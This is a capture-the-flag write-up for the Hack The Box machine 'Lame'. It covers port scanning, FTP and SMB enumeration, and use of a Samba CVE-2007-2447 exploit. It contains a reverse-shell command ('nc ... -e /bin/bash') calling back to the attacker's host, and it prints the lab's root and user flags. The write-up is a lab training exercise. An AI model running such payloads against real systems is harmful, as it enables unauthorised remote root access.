Lame

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.3:21
Open 10.10.10.3:22
Open 10.10.10.3:139
Open 10.10.10.3:445
Open 10.10.10.3:3632
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.10.3
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-27 19:52 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:53
Completed Parallel DNS resolution of 1 host. at 19:53, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:53
Scanning 10.10.10.3 [5 ports]
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 3632/tcp on 10.10.10.3
Completed Connect Scan at 19:53, 0.08s elapsed (5 total ports)
Initiating Service scan at 19:53
Scanning 5 services on 10.10.10.3
Completed Service scan at 19:53, 11.25s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.3.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
NSE: [ftp-bounce 10.10.10.3:21] PORT response: 500 Illegal PORT command.
NSE Timing: About 99.86% done; ETC: 19:53 (0:00:00 remaining)
Completed NSE at 19:53, 40.23s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.58s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up, received user-set (0.078s latency).
Scanned at 2024-07-27 19:53:00 UTC for 53s

PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.37
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
| ssh-dss
|   2048 5656240f211ddea72bae61b1243de8f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-27T15:54:37-04:00
|_clock-skew: mean: 2h01m23s, deviation: 2h49m43s, median: 1m22s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 58198/tcp): CLEAN (Timeout)
|   Check 3 (port 51269/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.13 seconds
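As an added example (not part of the original writeup), here is a small Python triage of the nmap output above: it parses the port table and the NSE script lines and flags what a defender would escalate from this host, namely the anonymous FTP login, the vsftpd 2.3.4 and Samba 3.0.20 banners, the exposed distcc service, and SMB message signing being disabled. The sample text is a constructed subset of the scan log shown above.

```python
import re

# Constructed sample: a subset of the nmap normal output from the scan above.
NMAP_SAMPLE = """\
PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# port/proto  state  service  reason  version...
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s+\S+\s*(.*)$")

# Banners worth escalating; the versions and the CVE come from this scan/writeup.
RISKY_BANNERS = {
    "vsftpd 2.3.4": "vsftpd 2.3.4: release known to carry a backdoor",
    "Samba smbd 3.0.20": "Samba 3.0.20: affected by CVE-2007-2447",
    "distccd": "distcc exposed: unauthenticated remote job execution service",
}


def triage(nmap_text):
    """Return a list of (port, finding) tuples for risky items in nmap output."""
    findings = []
    current_port = None
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current_port, state, version = int(m.group(1)), m.group(3), m.group(5)
            if state != "open":
                continue
            for banner, note in RISKY_BANNERS.items():
                if banner in version:
                    findings.append((current_port, note))
            continue
        # NSE lines start with "|" and refer to the last port seen, except the
        # host-script results, which come after the table; SMB signing maps to 445.
        if "Anonymous FTP login allowed" in line:
            findings.append((current_port, "anonymous FTP login enabled"))
        elif "message_signing: disabled" in line:
            findings.append((445, "SMB message signing disabled"))
    return findings


if __name__ == "__main__":
    for port, note in triage(NMAP_SAMPLE):
        print(f"{port:>5}  {note}")
```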

FTP (21)

vsftpd 2.3.4 is famous for a backdoor that gives a straight-up root shell, but the exploit doesn't seem to work here.

└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:woyag): uwu:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
ftp: Login failed

Connecting anonymously yields no results; the FTP root is empty.

SMB (139/445)

└─$ netexec smb 10.10.10.3 -u '' -p '' --shares
SMB         10.10.10.3      445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.10.10.3      445    LAME             [+] hackthebox.gr\:
SMB         10.10.10.3      445    LAME             [*] Enumerated shares
SMB         10.10.10.3      445    LAME             Share           Permissions     Remark
SMB         10.10.10.3      445    LAME             -----           -----------     ------
SMB         10.10.10.3      445    LAME             print$                          Printer Drivers
SMB         10.10.10.3      445    LAME             tmp             READ,WRITE      oh noes!
SMB         10.10.10.3      445    LAME             opt
SMB         10.10.10.3      445    LAME             IPC$                            IPC Service (lame server (Samba 3.0.20-Debian))
SMB         10.10.10.3      445    LAME             ADMIN$                          IPC Service (lame server (Samba 3.0.20-Debian))
└─$ smbclient -N //10.10.10.3/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Lame]
└─$ smbclient -N //10.10.10.3/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 27 16:06:06 2024
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  orbit-makis                        DR        0  Sat Jul 27 06:25:31 2024
  odgdkw                              N        0  Sat Jul 27 12:18:32 2024
  .ICE-unix                          DH        0  Fri Jul 26 16:14:16 2024
  vmware-root                        DR        0  Fri Jul 26 16:15:02 2024
  WFGYOZHNLE                          D        0  Fri Jul 26 16:24:49 2024
  .X11-unix                          DH        0  Fri Jul 26 16:14:42 2024
  gconfd-makis                       DR        0  Sat Jul 27 06:25:31 2024
  .X0-lock                           HR       11  Fri Jul 26 16:14:42 2024
  bojtot                              N        0  Fri Jul 26 16:58:42 2024
  5555.jsvc_up                        R        0  Fri Jul 26 16:15:18 2024
  vgauthsvclog.txt.0                  R     1600  Fri Jul 26 16:14:15 2024

                7282168 blocks of size 1024. 5385656 blocks available
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \odgdkw of size 0 as odgdkw (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \bojtot of size 0 as bojtot (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED opening remote file \5555.jsvc_up
getting file \vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (5.0 KiloBytes/sec) (average 1.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \orbit-makis\*
NT_STATUS_ACCESS_DENIED listing \vmware-root\*
NT_STATUS_ACCESS_DENIED opening remote file \.X11-unix\X0
NT_STATUS_ACCESS_DENIED listing \gconfd-makis\*
└─$ find . -empty -delete
└─$ lta
drwxr-xr-x    - woyag 27 Jul 16:06 .
.rw-r--r-- 1.6k woyag 27 Jul 16:05 └── vgauthsvclog.txt.0

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Lame/smb]
└─$ bat vgauthsvclog.txt.0
───────┬───────────────────────────────────────────────────────────────────
       │ File: vgauthsvclog.txt.0
───────┼───────────────────────────────────────────────────────────────────
   1   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
   2   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
   3   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Group 'service'
   4   │ [Jul 26 16:14:14.744] [ message] [VGAuthService]     samlSchemaDir=/usr/lib/vmware-vgauth/schemas
   5   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
   6   │ [Jul 26 16:14:15.094] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
   7   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
   8   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Group 'service'
   9   │ [Jul 26 16:14:15.095] [ message] [VGAuthService]     samlSchemaDir=/usr/lib/vmware-vgauth/schemas
  10   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
  11   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
  12   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] INIT SERVICE
  13   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
  14   │ [Jul 26 16:14:15.174] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
  15   │ [Jul 26 16:14:15.304] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
  16   │ [Jul 26 16:14:15.304] [ message] [VGAuthService] BEGIN SERVICE
───────┴───────────────────────────────────────────────────────────────────

Samba 3.0.20 seems to be vulnerable to CVE-2007-2447, so I used the CVE-2007-2447-in-Python exploit script:

└─$ py smbExploit.py 10.10.10.3 139 'nc 10.10.14.37 4444 -e /bin/bash'
[*] Sending the payload
---
└─$ listen
Ncat: Connection from 10.10.10.3:43005.
id # <- PS1 not visible
uid=0(root) gid=0(root)

Flags (from SMB)

cat /root/root.txt
05e0bd6ef0c84daaa82120cb3f5a8968
cat /home/makis/user.txt
31bc2e4d6bab2ae2d559bf08f7995c29
